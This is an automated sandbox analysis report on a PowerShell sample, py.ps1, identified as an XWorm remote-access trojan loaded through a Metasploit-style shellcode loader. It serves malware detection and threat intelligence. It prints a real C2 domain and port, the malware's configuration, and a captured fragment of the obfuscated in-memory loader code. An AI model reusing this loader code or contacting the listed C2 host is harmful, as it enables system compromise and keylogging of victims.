Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
py.ps1

Overview

General Information

Sample name:py.ps1
Analysis ID:1429326
MD5:b570fa6c00d2478e939db9f5a3217afd
SHA1:246ea84aa4fabbf26048d8a5bf9e66918971c1a1
SHA256:de367800fbe772f10c52e4dff9a39de73ab08379c19f326680dc677eeba69bbc
Tags:ps1
Infos:

Detection

Metasploit, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected MetasploitPayload
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Found suspicious powershell code related to unpacking or dynamic code loading
Hijacks the control flow in another process
Loading BitLocker PowerShell Module
Queues an APC in another process (thread injection)
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 1780 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\py.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • notepad.exe (PID: 3300 cmdline: C:\Windows\System32\notepad.exe MD5: 27F71B12CB585541885A31BE22F61C83)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["nmds.duckdns.org"], "Port": "8895", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.3066881739.000001D112FC0000.00000020.00000001.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x9aaf:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0xc517:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000007.00000002.3066881739.000001D112FC0000.00000020.00000001.00020000.00000000.sdmpWindows_Trojan_Donutloader_5c38878dunknownunknown
  • 0xa206:$a: 24 48 03 C2 48 89 44 24 28 41 8A 00 84 C0 74 14 33 D2 FF C1
00000007.00000002.3067644587.000001D114A90000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    00000007.00000002.3067644587.000001D114A90000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x70b0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x714d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x7262:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x6d5c:$cnc4: POST / HTTP/1.1
    00000007.00000002.3067774125.000001D114C51000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      Click to see the 2 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      7.2.notepad.exe.1d114a90000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
        7.2.notepad.exe.1d114a90000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x52b0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x534d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x5462:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x4f5c:$cnc4: POST / HTTP/1.1
        7.2.notepad.exe.1d114c5cec8.1.unpackJoeSecurity_XWormYara detected XWormJoe Security
          7.2.notepad.exe.1d114c5cec8.1.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x52b0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x534d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x5462:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x4f5c:$cnc4: POST / HTTP/1.1
          7.2.notepad.exe.1d114a90000.0.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
            Click to see the 3 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_1780.amsi.csvJoeSecurity_MetasploitPayload_1Yara detected MetasploitPayloadJoe Security

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\py.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\py.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\py.ps1", ProcessId: 1780, ProcessName: powershell.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\py.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\py.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\py.ps1", ProcessId: 1780, ProcessName: powershell.exe

              Snort Signatures

              No Snort rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 00000007.00000002.3067774125.000001D114C51000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["nmds.duckdns.org"], "Port": "8895", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}
              Sample uses string decryption to hide its real strings
              Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpackString decryptor: nmds.duckdns.org
              Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpackString decryptor: 8895
              Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpackString decryptor: <123456789>
              Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpackString decryptor: <Xwormmm>
              Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpackString decryptor: USB.exe

              Networking

              barindex
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: nmds.duckdns.org
              Source: powershell.exe, 00000000.00000002.3073247493.0000011C86717000.00000004.00000800.00020000.00000000.sdmp, py.ps1String found in binary or memory: https://github.com/DARKNOSY/Rush-PowerShell-Obfuscator

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Contains functionality to log keystrokes (.Net Source)
              Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
              Source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, XLogger.cs.Net Code: KeyboardLayout

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 7.2.notepad.exe.1d114a90000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 7.2.notepad.exe.1d114c5cec8.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000007.00000002.3066881739.000001D112FC0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000007.00000002.3066881739.000001D112FC0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
              Source: 00000007.00000002.3067644587.000001D114A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000007.00000002.3067774125.000001D114C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: C:\Windows\System32\notepad.exeCode function: 7_2_000001D112FCAF237_2_000001D112FCAF23
              Source: C:\Windows\System32\notepad.exeCode function: 7_2_000001D112FCAB037_2_000001D112FCAB03
              Source: C:\Windows\System32\notepad.exeCode function: 7_2_000001D112FCB35B7_2_000001D112FCB35B
              Source: C:\Windows\System32\notepad.exeCode function: 7_2_000001D112FCB7E37_2_000001D112FCB7E3
              Source: C:\Windows\System32\notepad.exeCode function: 7_2_000001D112FC9EDB7_2_000001D112FC9EDB
              Source: 7.2.notepad.exe.1d114a90000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 7.2.notepad.exe.1d114c5cec8.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000007.00000002.3066881739.000001D112FC0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000007.00000002.3066881739.000001D112FC0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
              Source: 00000007.00000002.3067644587.000001D114A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000007.00000002.3067774125.000001D114C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
              Source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
              Source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: classification engineClassification label: mal100.troj.spyw.evad.winPS1@4/10@0/0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
              Source: C:\Windows\System32\notepad.exeMutant created: NULL
              Source: C:\Windows\System32\notepad.exeMutant created: \Sessions\1\BaseNamedObjects\O3B5rRVaa3oX74CD
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6856:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qcgvnz3n.01j.ps1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();Set-StrictMode -Version 2$DoIt = @'function Crypt { param ( [byte[]]$key, [byte[]]$data ) $s = 0..255 $j = 0 for ($i = 0; $i -lt 256; $i++) { $j = ($j + $s[$i] + $key[$i % $key.Length]) % 256 $s[$i], $s[$j] = $s[$j], $s[$i] } $i = $j = 0 $output = [byte[]]::new($data.Length) for ($count = 0; $count -lt $data.Length; $count++) { $i = ($i + 1) % 256 $j = ($j + $s[$i]) % 256 $s[$i], $s[$j] = $s[$j], $s[$i] $k = $s[($s[$i] + $s[$j]) % 256] $output[$count] = $data[$count] -bxor $k } $output}function func_get_proc_address{Param($var_module, $var_procedure)$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress',[Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))}function func_get_delegate_type{Param([Parameter(Position = 0, Mandatory = $True)][Type[]] $var_parameters,[Parameter(Position = 1)][Type] $var_return_type = [Void])$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass',[System.MulticastDelegate])$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')return $var_type_builder.CreateType()}[Byte[]]$encryptedData = [System.Convert]::FromBase64String('S2zQef7TSeC39ba951ff8aLEINWPwe4gd9a4D0IvvbJAKTLwScmCXssrU5vuP0I6d8DDIqWLhFUVxXHWNW6xFuvYV8uJMBzIJGXdZPpyhcn+czDuyHLf0WkTCmsH7ynEolA9SwiJ+qNnNXmFg8eJBCYd7S7bAjzXGx6f3OM40JKvgSawCx6PdpB85hZmymkB2R+rWCntVjdk8n5Y7ayQLjnOpY93HT9eOfL7cM7OJ+buySorWzSfrtFw2UplbgFC3dQ9atxsq+pVlN2k/JyfOcp+Rn3MxqkMPv4txECniExP6Qf+PIysijWTfoDX0h2rmsgXAY6a10Ic42t24HmqZUp2/isLFOWpmm4MXha6T6P5+M74LadLqIhwzrtd257hCbaY9AavDrFTcOSQlbqTyhU1akwDAWUfzTBlR12cbkVp83MFLQ6CjJVI6DHDTs1K8funj222WQY30bee88AlDX9lp5hi1a7gqx7O1IZL66xPsCpWnAZ7tEbMFPz0M6vkzAiCssjdmqEEMRAVrlQh9n5JW7XkyxGU4hKDd54ctiTTqrQHVgCgcbrqesooEisvaY/NSQDQvsWi2HBysCk56EytVkaP7QbFTyRA/Y7XrGwtiMIaqQAsQ3xHWSy/hfhNrPrHE286abB+DrBBIQehjdaw6zWw4yl+NzKpOAVPscnelDCSninU8fl/AOL9G5UmAT1Oclgo3n2mVsv97sjIfmzO6+oJCQE1a
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
              Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\py.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\notepad.exe C:\Windows\System32\notepad.exe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\notepad.exe C:\Windows\System32\notepad.exeJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: winsta.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: py.ps1Static file information: File size 13631488 > 1048576

              Data Obfuscation

              barindex
              .NET source code contains method to dynamically call methods (often used by packers)
              Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
              .NET source code contains potential unpacker
              Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
              Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
              Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, Messages.cs.Net Code: Memory
